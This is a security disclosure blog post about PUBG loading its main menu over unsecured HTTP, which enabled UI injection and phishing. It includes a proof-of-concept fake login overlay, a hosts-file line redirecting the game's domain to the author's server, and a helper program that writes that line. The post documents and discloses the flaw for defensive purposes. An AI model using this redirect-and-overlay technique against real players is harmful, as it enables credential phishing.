Update: This security hole has been plugged. See my next post for details.
Update update: There was a false-alarm report that this problem returned. Read about it here.
PlayerUnknown’s Battlegrounds (or PUBG for short) is a new, extremely popular video game. It focuses around “battle royale” gameplay, pitting up to 100 players against each other in a fight to be the last one standing.
The game and its developer (Bluehole) are very ambitious, and have been wildly successful with PUBG. Despite the game not yet being officially “released”, it has topped two million concurrent players, made tens of millions of dollars, and has a burgeoning e-Sports presence. This sort of exposure and success comes with certain expectations — performance, stability, visuals, AAA-competitive marketing, etc — which have not always been met. This article is not about them; it’s about security.
First, let’s look at the very basics of the problem. What is it, how big of a deal is it, and what does it mean to you?
The PUBG main menu is a webpage loaded remotely in an unsecured HTTP connection, making it vulnerable to cross-site scripting (XSS) via a man-in-the-middle (MITM) attack, or other ways to mess up HTTP requests. This means very easy and credible phishing, spying on user behavior, plus other possible attack angles.
Again, in English this time… The PUBG loading screen and the various user interface elements in its main menu are not technically part of the game you (a player) “install”. When you launch the game, they are fetched from an official server and rendered on top of the actual game (the 3D model of your character standing around). This rendering is done via a transparent “browser” that treats them as if they were an actual webpage.
The blue arrows are pointing to UI elements that are actually a “webpage”
The connection through which these elements are loaded is not secure. That means that, while the data is moving from the PUBG server to your computer, it can be intercepted and modified. In other words, someone operating any part of the connection between you and the PUBG server could manipulate the data and change what you see in your main menu, or make the main menu do things it normally would not — for example, report what in-game items you own to a third party.
That sounds serious. Why are you making this public? It is indeed serious. Normally I would not make such a big deal over a bug in an “early access” game, but as I mentioned earlier, PUBG is itself a big deal. Early access or not, this bug impacts the security of tens of millions of people. I have already reported the bug with Bluehole’s support and their forums more than two weeks ago. As it was not fixed expeditiously, and is a serious issue, I feel it is my responsibility to inform the community of the risk.
What is the actual danger to players? For a hacker to take advantage of this vulnerability, they need to either have malware already on your computer (in which case you have bigger problems) or they need to be a “middle-man” in between you and PUBG. That means that, if you are doing any of these things, you are at risk:
If a hacker does manage to take advantage of this, they can at the very least modify what you see on your screen, easily making it look like an official part of PUBG.
I even went ahead and created a proof of concept. After seeing the animated Bluehole splash screen and the game music starts, you could be confronted with this:
Looks very official, right? It’s completely fake, and delivered from a server completely unrelated to PUBG or Bluehole, and could send me your login details if you input them (it does not, though).
It is also possible there are far more nefarious things for the hacker to do. I am not a security researcher and do not have enough code access to say for sure. At the very least, this security hole has been used by Xfinity to advertise inside the game itself.
What’s the next step? Short of not playing PUBG at all, there is little way for players to completely avoid this risk. To reduce it as much as you can, only play on your home network, using a wired connection, or wireless if your router is not in range of any potential hackers.
More importantly though, this needs to be fixed as soon as possible. Since PUBG is “being developed with community feedback” (according to its Steam page) it needs your feedback on this issue for it to be tackled in a timely fashion. Please drop a word to the developers in their forums, in a review, or on social media. With your help, PUBG’s security can be as impenetrable as this pan:
This is where we get into the technical weeds. If you’re not interested, please feel free to tune out.
I have a confession: I did not find this issue by myself. I was tipped off by a friend who pointed me to a post someone made on the PUBG forums more than six months ago, complaining that Xfinity is able to inject ads into the main menu, as they do with other insecure websites. Their shady ISP practices aside, this is a massive red flag. Shockingly, the issue was not addressed at all, and the thread ended with a resounding “meh”:
Nope, not an April 1st joke!
Being a web (-ish) developer myself, this piqued my curiosity so I dug into it.
Doing so, I found that every time the game loads, a HTTP GET request is sent to http://front.battlegroundsgame.com/index.html. Its contents?
$ curl http://front.battlegroundsgame.com/index.html<script>var url = window.location.search;url = url.replace("?", '');location.href='https://prod-live-front.playbattlegrounds.com/2017.09.14-2017.10.02-556/index-steam.2017.09.14-2017.10.02-556.html?'+url;</script>
My actual reaction, as those in the chatroom I was in can attest
That’s it. That’s what loads the entire UI.
Not only is it not valid HTML in the first place, and served over a completely unsecured plain HTTP connection, but this would be bad practice even if those things weren’t a problem!
Naturally, I continued down the rabbit hole by loading that URL in a browser:
Loading that URL actually loaded the PUBG UI! It also produced a wealth of information from looking at the queries themselves:
The Javascript files themselves are minified, so gleaning much from them is difficult… but not impossible. There’s some fun stuff in there:
Also, here’s some fun for social justice activists: the player objects have a default gender (male) and other physical properties, and various tokens that didn’t get minified have a weird “bro” related naming theme:
l.connection.sendMessage("UserProxyApi","InvalidateBroFriends",n)
Then, as the cherry to top it off, the console log contains confidence-inspiring lines such as:
[EGN] engine received DestoryLobbyCharacter:0 Array [ ] mock.entry.js:7:3
I don’t know what that’s about. Anyway… It looks like how I’d expect an “early access” code base to look. That unsecured HTTP request is a much bigger deal, so… Back to security talk!
Given that I know that the HTTP flaw I found can be exploited, I hastened to write a bug report to Bluehole about it. Going to their support site, I found that…
… it does not use secure communications itself, and for an authentication page, at that. That does not bode well.
I reported it anyway, and within a day I got a response from a Game Master acknowledging the report and requesting that I share it on the PUBG forums as well. The public PUBG forums. The ones where the whole world could see the problem. I did, and it seems to have gotten a similar amount of attention as the thread that got me on this track in the first place.
Given that there’s been an ample amount of time since the first mention of this issue to come up with a fix — or at least, a stopgap to not expose literally millions of players to hacking — here I am doing this write-up.
It is not just a write-up, though! For I have…
There were some screenshots of it before, but here it is in all its glory: https://github.com/fsufitch/pubg-mainmenu-hack. Update: I remembered to actually set the repository to “public” and it should actually be accessible now.
Disclaimer: this is not some of my best coding work. It’s messy and terrible, but it works. Do not code like this.
It consists of a simple Go-based server that serves an index.html
file, loading a bunch of “evil” JS code that injects itself into the UI, attempting to phish the user. Of course, I am not actually saving anyone’s info, and the “login” form is a dummy, but it does provide a striking visual:
Legit or not?
This hacked UI is live and available at http://104.239.228.225/index.html. (Update: I have disabled the server since it is no longer relevant but is still costing me to keep running.) You can visit it with a web browser, or you can fool your own PUBG into loading it by adding the following line to your hosts
file:
104.239.228.225 front.battlegroundsgame.com
That is found at %SystemRoot%\System32\drivers\etc\hosts
for a Windows environment. Removing the line will disable the hack.
If you really don’t feel like editing that file, I put together a simple program that does it for you. It’s super suggestively named, just like malware that could do this without your knowledge. Instead of compromising your computer though, all it does is add the hosts
line, wait for you to push Enter, then remove the line.
Edit: Some comments I have received indicated that a hosts-file injection is not a “real” vulnerability, as a ton of things are vulnerable to that.While true, this hosts injection is a simple way to demo this problem, since an easy-to-apply, portable MITM demo is much harder to put together.
Video of this story as it happened
That’s the end of the PUBG security adventure… For now. Here’s hoping that Bluehole will continue improving PUBG on all fronts, stop putting users at risk, and become truly “e-Sports ready”. Thanks for reading!